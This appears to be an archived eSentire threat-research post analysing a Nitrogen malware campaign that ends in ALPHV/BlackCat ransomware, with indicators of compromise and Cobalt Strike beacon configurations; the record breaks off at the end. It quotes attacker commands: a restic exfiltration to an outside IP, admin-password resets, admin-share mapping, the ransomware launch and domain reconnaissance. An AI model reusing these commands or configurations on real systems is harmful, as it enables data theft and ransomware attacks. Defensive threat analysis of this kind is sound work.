{
	"id": "ed6943a8-8959-4838-ba12-d7ca8d586c6a",
	"created_at": "2026-04-06T00:06:42.245155Z",
	"updated_at": "2026-04-10T03:29:40.176014Z",
	"deleted_at": null,
	"sha1_hash": "ccfe60f5a8e32c118e782abb5d3ad5d500b4bf25",
	"title": "Nitrogen Campaign 2.0: Reloads with Enhanced Capabilities Leading to ALPHV/BlackCat Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1769236,
	"plain_text": "Nitrogen Campaign 2.0: Reloads with Enhanced Capabilities\r\nLeading to ALPHV/BlackCat Ransomware\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-05 19:09:14 UTC\r\nAdversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters\r\nand Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.\r\nWe have discovered some of the most dangerous threats and nation state attacks in our space – including the\r\nKaseya MSP breach and the more_eggs malware.\r\nOur Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced\r\nThreat Analytics driven by our Threat Response Unit – the TRU team.\r\nIn TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We\r\noutline how we responded to the confirmed threat and what recommendations we have going forward.\r\nHere’s the latest from our TRU Team…\r\nIn October 2023, our Threat Response Unit (TRU) observed multiple incidents stemming from a new Nitrogen\r\ncampaign. You can read more on the previous Nitrogen campaign from one of our articles here. One of these\r\nincidents ultimately led to ALPHV/BlackCat Ransomware. In this case, threat actors infiltrated the network,\r\ngaining their initial foothold through malicious payloads from a drive-by download.\r\nA drive-by download involves the involuntary installation of malicious software on a user's system without their\r\ninformed consent. It often occurs when users visit or are redirected to compromised websites, sometimes through\r\nmechanisms like deceptive Google Ads. In this case, we assessed that the user was directed to malware on a\r\nwebsite posing as legitimate software from a search advertisement. In the second case, the user was deceived\r\nwhen attempting to install WinSCP software.\r\nThis article will explore the commands employed by the threat actors during their post-exploitation phase and take\r\na closer look at the payloads involved.\r\nInitial Infection Stage and Technical Analysis\r\nIn the first incident, our team traced post-exploitation activity to an unmanaged device with access to the\r\ncustomer’s network. Analysis of available logs pointed to a drive-by download and installation of Nitrogen\r\npayloads from a malicious search advertisement.\r\nFortunately, we were able to identify a matching ISO file uploaded to VirusTotal (MD5:\r\n06345b04244b629f9632009cafa23fc1). Our analysis of the initial infection stage draws from this file, which was\r\ncorroborated with behaviors we observed from our security telemetry from this incident and others.\r\nhttps://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\r\nPage 1 of 18\n\nThe ISO image contains multiple files, as shown in Figure 1.\r\nFigure 1: Contents of an ISO image\r\nThe “support’ folder contains multiple garbage files. We will focus on the following files:\r\ndata (MD5: a2b4adedd0f1d24e33d82abebfe976c8)\r\nfoo.dll (MD5: 9aedc564960e5dddeb6524b39d5c2956)\r\nmsi.dll (MD5: 8342db04a12dd141b23a20fd393bb9f2)\r\nsetup.exe (MD5: e5da170027542e25ede42fc54c929077)\r\nsetup.exe is the Windows Installer executable (msiexec.exe). When executed, it loads the msi.dll file modified by\r\nthe threat actor(s). The msi.dll makes use of the custom import “nop” to load foo.dll with exported function name\r\n“nop” (Figure 2).\r\nhttps://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\r\nPage 2 of 18\n\nFigure 2: Custom import loading foo.dll\r\nfoo.dll is responsible for decrypting the “data” file with the AES algorithm. The key and IV are hardcoded in\r\nobfuscated form in the binary. Like in the previous campaign, some strings are obfuscated using a simple Ceasar\r\nCipher algorithm, where each character is shifted up by a specific number of places (e.g., 5), as shown in Figure 3.\r\nFigure 3: Ceasar Cipher encryption on some of the strings used in the binary\r\nUpon decrypting the “data” file, we obtain a ZIP archive, as shown in Figure 4, where custom_installer.exe (MD5:\r\n55144c356dbfaf88190c054011db812e) is another malicious payload and Advanced_IP_Scanner.exe (MD5:\r\n5537c708edb9a2c21f88e34e8a0f1744) is a legitimate decoy of Advanced IP Scanner installer.\r\nFigure 4: Contents of the decrypted ZIP archive\r\ncustom_installer.exe payload is responsible for decrypting another ZIP archive that contains additional payloads to\r\nbe placed across multiple folders, as well as establishing a persistence mechanism via scheduled tasks. The folders\r\ncontaining malicious payloads are shown in Figure 5. The files in the Notepad folder in this particular sample only\r\ncontain legitimate Python dependencies and are not included in the screenshot for clarity purposes.\r\nhttps://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\r\nPage 3 of 18\n\nFigure 5: Decrypted ZIP archive containing the payloads that are dropped across multiple folders\r\n(custom_installer.exe)\r\nIn the previous campaign, Nitrogen set the scheduled tasks to point to pythonw.exe in order to side-load the\r\nmalicious DLL. The latest campaign, in contrast, creates two scheduled tasks that execute the commands shown in\r\nFigure 6.\r\nFigure 6: Encrypted commands in the scheduled tasks\r\nThe scheduled task names (OneDrive Security Task-S-1-5-21-5678566754-9123742832-2638705499-2003)\r\nremain the same as in the previous campaign. The file update.exe (MD5: e5da170027542e25ede42fc54c929077)\r\nis a legitimate msiexec.exe executable (Windows Installer) that has been renamed. When the command is\r\nexecuted, the payload spawns under the processes spoolsv.exe and dllhost.exe within the directories “C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\OneDrive\\” and “C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Security\\” respectively.\r\nUpon further analysis of the binary, we discovered that the base64-encoded string contains a nonce, an encrypted\r\nkey, and a list of text strings encrypted using the ChaCha stream cipher. The decrypted strings are the following:\r\ntransacted_hollowing#C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Security\\pythonw.exe#C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Security\\dllhost.exe\r\ntransacted_hollowing#C:\\Users\\\u003cusername\u003e\\AppData\\Local\\OneDrive\\pythonw.exe#C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\OneDrive\\spoolsv.exe\r\nThe ‘msi.dll” files are side-loaded during the scheduled task execution and contain the custom imports to\r\nadditionally load zen.dll (MD5: 6557a11aac33c4e6e10eeea252157f3e) and fid.dll (MD5:\r\n1f04ca6ffef0b737204f3534ff73575e) files shown in Figure 5. These, in turn, access the base64-encoded\r\ncommand-line argument, decrypt it, and use the decrypted strings as configuration parameters.\r\nThe payloads zen.dll and fid.dll use the transacted hollowing technique as shown in Figure 7 (transacted hollowing\r\nis a technique that combines elements of both Process Hollowing and Process Doppelgänging) that involves\r\nWindows Native API functions, such as NtCreateTransaction and RtlSetCurrentTransaction to create and open the\r\ntransacted file, CreateProcessInternalW to create the spoolsv.exe and dllhost.exe processes in a suspended state,\r\nand perform process injection by unmapping the process memory and replacing it with pythonw.exe binary.\r\nhttps://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\r\nPage 4 of 18\n\nFigure 7: The code responsible for performing transacted hollowing\r\nWhen pythonw.exe is executed from the specified directories, it side-loads the malicious python311.dll files.\r\nThese files contain embedded and obfuscated C2 addresses (see Indicators of Compromise table), which are used\r\nfor persistent C2 communication.\r\nIn the recent Nitrogen campaign, besides introducing transacted hollowing, the threat actor(s) returned with an\r\narray of enhanced capabilities. These include bypassing the Antimalware Scan Interface (AMSI), bypasses for\r\nEvent Tracing for Windows (ETW) and Windows Lockdown Policy (WLDP), antivirus evasion by using\r\nAntiHook (used to evade userland hooking techniques employed by antivirus software) as well as utilizing the\r\nKrakenMask sleep obfuscation tool to mask return addresses within AMSI bypass, ETW, WLDP patching and\r\nAntiHook function, and encrypt the .text section contents. For the sake of brevity, we won't delve into the\r\ntechnical intricacies of these functions in this article.\r\nThe switch to the Sliver C2 Framework\r\nIn one of the recent Nitrogen samples, the slv.py (MD5: 88423cf8154ccc3278abea0e97446003) file is dropped\r\nunder C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Notepad folder.\r\nslv.py contains the Python code that decodes a base64 string, deserializes the resultant bytes using the marshal\r\nmodule, and then executes the resulting obfuscated Python code. We believe that the threat actor(s) adopted the\r\nobfuscation technique from this obfuscation tool.\r\nFigure 7 shows the disassembled Python bytecode. The bytecode is responsible for decrypting data.aes (MD5:\r\nd36269ac785f6b0588fbd7bfd1b50a57) using AES. The decrypted DLL is a Sliver payload (MD5:\r\na9e5c83f7d96144fa31126ef0a7a9e2f) that connects to the C2 server at 194.180.48[.]149:8443. Previously,\r\nNitrogen threat actors used Pyramid C2 Framework for post-exploitation.\r\nhttps://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\r\nPage 5 of 18\n\nFigure 8: Disassembled Python code (data.aes)\r\nNitrogen and Post-Exploitation Leading to ALPHV Ransomware\r\nUpon establishing the initial foothold, threat actors moved laterally to other hosts in the environment and dropped\r\nmultiple obfuscated Python scripts similar to slv.py:\r\nwo9.py (MD5: 45d8598ff20254c157330dbdf5a8110b)\r\nwo10.py (MD5: 0200a95373be2a1851db27c96704fc11)\r\nwo4.py (MD5: 5462b15734ef87764ef901ad0e20c353)\r\nupdateegge.py (MD5: 300ca3391a413faf0e5491898715365f)\r\nwo9.py, wo10.py, and wo4.py contain the AES-encrypted and embedded Cobalt Strike payloads. Using the Cobalt\r\nStrike configuration parser from SentinelOne, we can extract the Cobalt Strike configuration (see Indicators of\r\nCompromise table).\r\nupdateegge.py is similar to slv.py and decrypts dotae.aes (MD5: 4722f13c22abaa6045c544ee7dde3e5a) to the\r\nSliver payload (MD5: 9f1c9b28eaf00b9aec180179255d87c0) that connects to 185.216.70[.]236:8443.\r\nFurther on, threat actors utilized PsExec, and WMIC for lateral movement and running Restic (backup program)\r\nto exfiltrate data:\r\nrestic.exe -r rest:hxxp://195.123.230[.]165:8000/ --password-file ppp.txt --use-fs-snapshot --verbose\r\nbackup \\\\\u003cREDACTED\u003e\r\nThe threat actors also enabled Administrator and multiple other accounts with the password “GoodLuck!”:\r\nnet1 user Administrator GoodLuck! /domain\r\nhttps://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\r\nPage 6 of 18\n\nOne of the dropped batch files contained the command to map the C$ administrative share of a machine to the\r\nlocal drive letter N:, using the Administrator account with the password “GoodLuck!”, the command to copy\r\nALPHV ransomware binaries (safe.exe) from the N: drive to the C: drive:\r\nnet use N: \"\\\\\u003cREDACTED\u003e\\C$\" /USER:\u003cREDACTED\u003e\\Administrator GoodLuck! /PERSISTENT:YES\r\ncopy N:\\safe.exe C:\\\r\nC:\\safe.exe --access-token \u003cREDACTED\u003e\r\nAnother batch file named UpdateEGGE.bat contained the command to run the wo4.py file via pythonw.exe:\r\nC:\\\u003cREDACTED\u003e \\python\\pythonw.exe C:\\\u003cREDACTED\u003e \\python\\wo4.py\r\nWe also observed the threat actors renaming pythonw.exe to itw.exe and ServiceUpdate.exe.\r\nAnother Case of Nitrogen\r\nIn another incident involving a Nitrogen infection, our 24/7 SOC Cyber Analysts conducted an investigation to\r\ntrace the origin of the malicious file (Figure 9). They found that the affected user fell victim to a drive-by\r\ndownload while using a search platform, inadvertently downloading the malicious file.\r\nThreat actors used Punycode to make the domain look trustworthy. Punycode is a method used to encode Unicode\r\ncharacters into ASCII, mainly for internationalized domain names (IDNs) that contain non-ASCII characters. This\r\nallows domains to have characters from various languages. Threat actors can exploit Punycode to conduct what's\r\nknown as an IDN homograph attack.\r\nFigure 9: The malicious website serving fake WinSCP installer\r\nThe following reconnaissance commands were executed to gather information about the network and users:\r\nnltest /DOMAIN_TRUSTS\r\nnet group \"domain admins\" /DOMAIN\r\nnet1 localgroup Administrators\r\nhttps://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\r\nPage 7 of 18\n\nBased on the overlap in Tactics, Techniques, and Procedures (TTPs), we assess the primary objective was likely\r\nransomware deployment, similar to the previously mentioned case. The threat actor(s) made attempts to manually\r\nexecute the slv.py (Sliver payload) within the PowerShell command line.\r\nHow did we find it?\r\neSentire MDR for Endpoint identified Python-based post-exploitation activities.\r\nWhat did we do?\r\nInvestigated and confirmed the activity is malicious.\r\nOur team of 24/7 SOC Cyber Analysts isolated affected hosts to contain the incidents in accordance with\r\nthe business’ policies.\r\nWhat can you learn from this TRU positive?\r\nThe end goal for Nitrogen infections is to deliver ALPHV ransomware and perform data exfiltration.\r\nIn one of the cases, opportunistic infections resulting from drive-by downloads were leveraged for hands-on-keyboard attacks. This transition took place in under 1 hour and 18 minutes.\r\nThe threat actor(s) switched from using Pyramid C2 Framework to using Sliver C2.\r\nIn the latest Nitrogen campaign, threat actors introduced transacted hollowing and showcased an expanded\r\nset of advanced capabilities. They can now bypass the Antimalware Scan Interface (AMSI), patch Event\r\nTracing for Windows (ETW) and Windows Lockdown Policy (WLDP) and evade antiviruses using\r\nAntiHook. Additionally, the KrakenMask tool is employed to conceal return addresses within functions\r\nrelated to AMSI bypass, ETW, WLDP patching, and AntiHook, as well as to encrypt the .text section\r\ncontents.\"\r\nRecommendations from our Threat Response Unit (TRU) Team:\r\nTrain users to identify and report potentially malicious content using Phishing and Security Awareness\r\nTraining (PSAT) programs.\r\nEnsure employees have access to a dedicated software center to download corporate-approved software.\r\nProtect endpoints against malware by:\r\nEnsuring antivirus signatures are up-to-date.\r\nUsing a Next-Gen AV (NGAV) or Endpoint Detection and Response (EDR) tool to detect and\r\ncontain threats.\r\nOur Threat Response Unit (TRU) is a world-class team of threat researchers who develop new detections enriched\r\nby original threat intelligence and leverage new machine learning models that correlate multi-signal data and\r\nautomate rapid response to advanced threats.\r\nIf you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and\r\nput your business ahead of disruption.\r\nhttps://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\r\nPage 8 of 18\n\nLearn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an\neSentire Security Specialist.\nIndicators of Compromise\nwo9.py (Cobalt Strike Configuration)\nBeaconType - HTTPS\nPort - 443\nSleepTime - 16500\nMaxGetSize - 13982519\nJitter - 22\nMaxDNS - Not Found\nPublicKey_MD5 - 2cd4a66e04a7ebd4dac05143f656f916\nC2Server - walfat.com,/broadcast\nUserAgent - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gec\nHttpPostUri - /1/events/com.amazon.csm.csa.prod\nMalleable_C2_Instructions - Remove 1308 bytes from the end\n Remove 1 bytes from the end\n Remove 194 bytes from the beginning\n Base64 decode\nHttpGet_Metadata - ConstHeaders\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Origin: \u003chttps://www.amazon.com\u003e Referer: \u003chttps://www.amazon.com\u003e Sec-Fetch-Dest: empty\n Sec-Fetch-Mode: cors\n Sec-Fetch-Site: cross-site\n Te: trailers\n Metadata\n base64\n header \"x-amzn-RequestId\"\nHttpPost_Metadata - ConstHeaders\n Accept: */*\n Origin: \u003chttps://www.amazon.com\u003e SessionId\n base64url\n header \"x-amz-rid\"\n Output\n base64url\n prepend \"{\"events\":[{\"data\":{\"schemaId\":\"csa.VideoInteractions.1\",\"appli\n append \"\"\n\"\n append \"\"playerMode\":\"INLINE\",\"videoRequestId\":\"MBFV82TTQV2JNBKJJ50B\",\"i\n print\nhttps://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\nPage 9 of 18\n\nPipeName - Not Found\r\nDNS_Idle - Not Found\r\nDNS_Sleep - Not Found\r\nSSH_Host - Not Found\r\nSSH_Port - Not Found\r\nSSH_Username - Not Found\r\nSSH_Password_Plaintext - Not Found\r\nSSH_Password_Pubkey - Not Found\r\nSSH_Banner -\r\nHttpGet_Verb - GET\r\nHttpPost_Verb - POST\r\nHttpPostChunk - 0\r\nSpawnto_x86 - %windir%\\syswow64\\gpupdate.exe\r\nSpawnto_x64 - %windir%\\sysnative\\gpupdate.exe\r\nCryptoScheme - 0\r\nProxy_Config - Not Found\r\nProxy_User - Not Found\r\nProxy_Password - Not Found\r\nProxy_Behavior - Use IE settings\r\nWatermark_Hash - 3Hh1YX4vT3i5C7L2sn7K4Q==\r\nWatermark - 587247372\r\nbStageCleanup - True\r\nbCFGCaution - True\r\nKillDate - 0\r\nbProcInject_StartRWX - True\r\nbProcInject_UseRWX - False\r\nbProcInject_MinAllocSize - 16700\r\nProcInject_PrependAppend_x86 - b'\\x90\\x90\\x90'\r\n Empty\r\nProcInject_PrependAppend_x64 - b'\\x90\\x90\\x90'\r\n Empty\r\nProcInject_Execute - ntdll.dll:RtlUserThreadStart\r\n SetThreadContext\r\n NtQueueApcThread-s\r\n kernel32.dll:LoadLibraryA\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\nProcInject_AllocationMethod - NtMapViewOfSection\r\nbUsesCookies - False\r\nHostHeader -\r\nheadersToRemove - Not Found\r\nDNS_Beaconing - Not Found\r\nDNS_get_TypeA - Not Found\r\nDNS_get_TypeAAAA - Not Found\r\nDNS_get_TypeTXT - Not Found\r\nDNS_put_metadata - Not Found\r\nDNS_put_output - Not Found\r\nhttps://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\r\nPage 10 of 18\n\nDNS_resolver - Not Found\nDNS_strategy - round-robin\nDNS_strategy_rotate_seconds - -1\nDNS_strategy_fail_x - -1\nDNS_strategy_fail_seconds - -1\nRetry_Max_Attempts - 0\nRetry_Increase_Attempts - 0\nRetry_Duration - 0\nwo10.py (Cobalt Strike Configuration)\nBeaconType - HTTPS\nPort - 443\nSleepTime - 38500\nMaxGetSize - 13982519\nJitter - 27\nMaxDNS - Not Found\nPublicKey_MD5 - 0c8df700d0c4fe42874842c307f4f62d\nC2Server - 194.180.48[.]169,/broadcast\nUserAgent - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gec\nHttpPostUri - /1/events/com.amazon.csm.csa.prod\nMalleable_C2_Instructions - Remove 1308 bytes from the end\n Remove 1 bytes from the end\n Remove 194 bytes from the beginning\n Base64 decode\nHttpGet_Metadata - ConstHeaders\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Origin: \u003chttps://www.amazon.com\u003e Referer: \u003chttps://www.amazon.com\u003e Sec-Fetch-Dest: empty\n Sec-Fetch-Mode: cors\n Sec-Fetch-Site: cross-site\n Te: trailers\n Metadata\n base64\n header \"x-amzn-RequestId\"\nHttpPost_Metadata - ConstHeaders\n Accept: */*\n Origin: \u003chttps://www.amazon.com\u003e SessionId\n base64url\n header \"x-amz-rid\"\n Output\n base64url\n prepend \"{\"events\":[{\"data\":{\"schemaId\":\"csa.VideoInteractions.1\",\"appli\n append \"\"\n\"\n append \"\"playerMode\":\"INLINE\",\"videoRequestId\":\"MBFV82TTQV2JNBKJJ50B\",\"i\nhttps://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\nPage 11 of 18\n\nprint\r\nPipeName - Not Found\r\nDNS_Idle - Not Found\r\nDNS_Sleep - Not Found\r\nSSH_Host - Not Found\r\nSSH_Port - Not Found\r\nSSH_Username - Not Found\r\nSSH_Password_Plaintext - Not Found\r\nSSH_Password_Pubkey - Not Found\r\nSSH_Banner -\r\nHttpGet_Verb - GET\r\nHttpPost_Verb - POST\r\nHttpPostChunk - 0\r\nSpawnto_x86 - %windir%\\syswow64\\gpupdate.exe\r\nSpawnto_x64 - %windir%\\sysnative\\gpupdate.exe\r\nCryptoScheme - 0\r\nProxy_Config - Not Found\r\nProxy_User - Not Found\r\nProxy_Password - Not Found\r\nProxy_Behavior - Use IE settings\r\nWatermark_Hash - 3Hh1YX4vT3i5C7L2sn7K4Q==\r\nWatermark - 587247372\r\nbStageCleanup - True\r\nbCFGCaution - True\r\nKillDate - 0\r\nbProcInject_StartRWX - True\r\nbProcInject_UseRWX - False\r\nbProcInject_MinAllocSize - 16700\r\nProcInject_PrependAppend_x86 - b'\\x90\\x90\\x90'\r\n Empty\r\nProcInject_PrependAppend_x64 - b'\\x90\\x90\\x90'\r\n Empty\r\nProcInject_Execute - ntdll.dll:RtlUserThreadStart\r\n SetThreadContext\r\n NtQueueApcThread-s\r\n kernel32.dll:LoadLibraryA\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\nProcInject_AllocationMethod - NtMapViewOfSection\r\nbUsesCookies - False\r\nHostHeader -\r\nheadersToRemove - Not Found\r\nDNS_Beaconing - Not Found\r\nDNS_get_TypeA - Not Found\r\nDNS_get_TypeAAAA - Not Found\r\nDNS_get_TypeTXT - Not Found\r\nDNS_put_metadata - Not Found\r\nhttps://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\r\nPage 12 of 18\n\nDNS_put_output - Not Found\nDNS_resolver - Not Found\nDNS_strategy - round-robin\nDNS_strategy_rotate_seconds - -1\nDNS_strategy_fail_x - -1\nDNS_strategy_fail_seconds - -1\nRetry_Max_Attempts - 0\nRetry_Increase_Attempts - 0\nRetry_Duration - 0\nwo4.py (Cobalt Strike Configuration)\nBeaconType - HTTPS\nPort - 443\nSleepTime - 38500\nMaxGetSize - 13982519\nJitter - 27\nMaxDNS - Not Found\nPublicKey_MD5 - 29258dbeb61aecb59f8facf9a0d0e30d\nC2Server - 194.169.175[.]132,/broadcast\nUserAgent - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gec\nHttpPostUri - /1/events/com.amazon.csm.csa.prod\nMalleable_C2_Instructions - Remove 1308 bytes from the end\n Remove 1 bytes from the end\n Remove 194 bytes from the beginning\n Base64 decode\nHttpGet_Metadata - ConstHeaders\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Origin: \u003chttps://www.amazon.com\u003e Referer: \u003chttps://www.amazon.com\u003e Sec-Fetch-Dest: empty\n Sec-Fetch-Mode: cors\n Sec-Fetch-Site: cross-site\n Te: trailers\n Metadata\n base64\n header \"x-amzn-RequestId\"\nHttpPost_Metadata - ConstHeaders\n Accept: */*\n Origin: \u003chttps://www.amazon.com\u003e SessionId\n base64url\n header \"x-amz-rid\"\n Output\n base64url\n prepend \"{\"events\":[{\"data\":{\"schemaId\":\"csa.VideoInteractions.1\",\"appli\n append \"\"\n\"\nhttps://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\nPage 13 of 18\n\nappend \"\"playerMode\":\"INLINE\",\"videoRequestId\":\"MBFV82TTQV2JNBKJJ50B\",\"i\r\n print\r\nPipeName - Not Found\r\nDNS_Idle - Not Found\r\nDNS_Sleep - Not Found\r\nSSH_Host - Not Found\r\nSSH_Port - Not Found\r\nSSH_Username - Not Found\r\nSSH_Password_Plaintext - Not Found\r\nSSH_Password_Pubkey - Not Found\r\nSSH_Banner -\r\nHttpGet_Verb - GET\r\nHttpPost_Verb - POST\r\nHttpPostChunk - 0\r\nSpawnto_x86 - %windir%\\syswow64\\gpupdate.exe\r\nSpawnto_x64 - %windir%\\sysnative\\gpupdate.exe\r\nCryptoScheme - 0\r\nProxy_Config - Not Found\r\nProxy_User - Not Found\r\nProxy_Password - Not Found\r\nProxy_Behavior - Use IE settings\r\nWatermark_Hash - 3Hh1YX4vT3i5C7L2sn7K4Q==\r\nWatermark - 587247372\r\nbStageCleanup - True\r\nbCFGCaution - True\r\nKillDate - 0\r\nbProcInject_StartRWX - True\r\nbProcInject_UseRWX - False\r\nbProcInject_MinAllocSize - 16700\r\nProcInject_PrependAppend_x86 - b'\\x90\\x90\\x90'\r\n Empty\r\nProcInject_PrependAppend_x64 - b'\\x90\\x90\\x90'\r\n Empty\r\nProcInject_Execute - ntdll.dll:RtlUserThreadStart\r\n SetThreadContext\r\n NtQueueApcThread-s\r\n kernel32.dll:LoadLibraryA\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\nProcInject_AllocationMethod - NtMapViewOfSection\r\nbUsesCookies - False\r\nHostHeader -\r\nheadersToRemove - Not Found\r\nDNS_Beaconing - Not Found\r\nDNS_get_TypeA - Not Found\r\nDNS_get_TypeAAAA - Not Found\r\nDNS_get_TypeTXT - Not Found\r\nhttps://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\r\nPage 14 of 18\n\nDNS_put_metadata - Not Found\r\nDNS_put_output - Not Found\r\nDNS_resolver - Not Found\r\nDNS_strategy - round-robin\r\nDNS_strategy_rotate_seconds - -1\r\nDNS_strategy_fail_x - -1\r\nDNS_strategy_fail_seconds - -1\r\nRetry_Max_Attempts - 0\r\nRetry_Increase_Attempts - 0\r\nRetry_Duration - 0\r\nName Indicators\r\nInitial Nitrogen ISO file 06345b04244b629f9632009cafa23fc1\r\ndata a2b4adedd0f1d24e33d82abebfe976c8\r\nfoo.dll 9aedc564960e5dddeb6524b39d5c2956\r\nmsi.dll 8342db04a12dd141b23a20fd393bb9f2\r\ncustom_installer.exe 55144c356dbfaf88190c054011db812e\r\nupdate.exe e5da170027542e25ede42fc54c929077\r\nzen.dll 6557a11aac33c4e6e10eeea252157f3e\r\nfid.dll 1f04ca6ffef0b737204f3534ff73575e\r\nslv.py 88423cf8154ccc3278abea0e97446003\r\ndata.aes d36269ac785f6b0588fbd7bfd1b50a57\r\nwo9.py 45d8598ff20254c157330dbdf5a8110b\r\nwo10.py 0200a95373be2a1851db27c96704fc11\r\nwo4.py 5462b15734ef87764ef901ad0e20c353\r\nupdateegge.py 300ca3391a413faf0e5491898715365f\r\ndotae.aes 4722f13c22abaa6045c544ee7dde3e5a\r\nSliver payload 9f1c9b28eaf00b9aec180179255d87c0\r\nNitrogen C2 185.216.70[.]236:8443\r\nNitrogen C2 185.216.70[.]236:8443\r\nNitrogen C2 194.180.48[.]149:8443\r\nhttps://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\r\nPage 15 of 18\n\nNitrogen C2 tcp://171.22.28[.]245:15159/\r\nNitrogen C2 tcp://171.22.28[.]245:41337\r\nNitrogen C2 194.180.48[.]18:10443/\r\nNitrogen C2 tcpssl://171.22.28[.]245:20407/\r\nNitrogen C2 171.22.28[.]245:10443\r\nCobalt Strike C2 194.169.175[.]132\r\nCobalt Strike C2 194.180.48[.]169\r\nCobalt Strike C2 walfat[.]com\r\nCobalt Strike C2 193.42.33[.]29\r\nPotential Brute Ratel C2\r\n(observed in one of the\r\ncampaigns)\r\n185.216.71[.]108\r\nALPHV binary 50da58b837bb80f840891cf5c212902b9431349c3b2e2707f1e0f9df226fa512\r\nALPHV binary 44d3065d4c5c1a2a448de07ffe256a8e73795770c9462d8d27f659671f8455d2\r\nPsExec 9d00158489f0a399fc0bc3ce1e8fc309d29a327f6ea0097e34e0f49b72a85079\r\nWebsite hosting fake\r\nWinSCP installer\r\nhxxp://xn—wnscp-tsa.net\r\nReferences\r\nhttps://www.esentire.com/blog/persistent-connection-established-nitrogen-campaign-leverages-dll-side-loading-technique-for-c2-communication\r\nhttps://www.esentire.com/security-advisories/increased-activity-in-google-ads-distributing-information-stealershttps://github.com/hasherezade/transacted_hollowing\r\nhttps://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal\r\nhttps://learn.microsoft.com/en-us/windows/win32/etw/about-event-tracing\r\nhttps://learn.microsoft.com/en-us/windows/win32/devnotes/windows-lockdown-policy\r\nhttps://github.com/BishopFox/sliver\r\nhttps://github.com/NtRaiseHardError/Antimalware-Research/tree/master/Generic/Userland\r\nHooking/AntiHook\r\nhttps://en.wikipedia.org/wiki/IDN_homograph_attack\r\nhttps://github.com/Sl-Sanda-Ru/Py-Fuscate/blob/main/py_fuscate.py\r\nhttps://github.com/Sentinel-One/CobaltStrikeParser\r\nhttps://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\r\nPage 16 of 18\n\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next\r\nLevel MDR, connect with an eSentire Security Specialist now.\r\nGET STARTED\r\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your\r\norganization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7\r\nSecurity Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and\r\nworks as an extension of your security team to continuously improve our Managed Detection and Response\r\nservice. By providing complete visibility across your attack surface and performing global threat sweeps and\r\nhttps://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\r\nPage 17 of 18\n\nproactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending\r\nyour organization against known and unknown threats.\r\nSource: https://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\r\nhttps://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\r\nPage 18 of 18",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
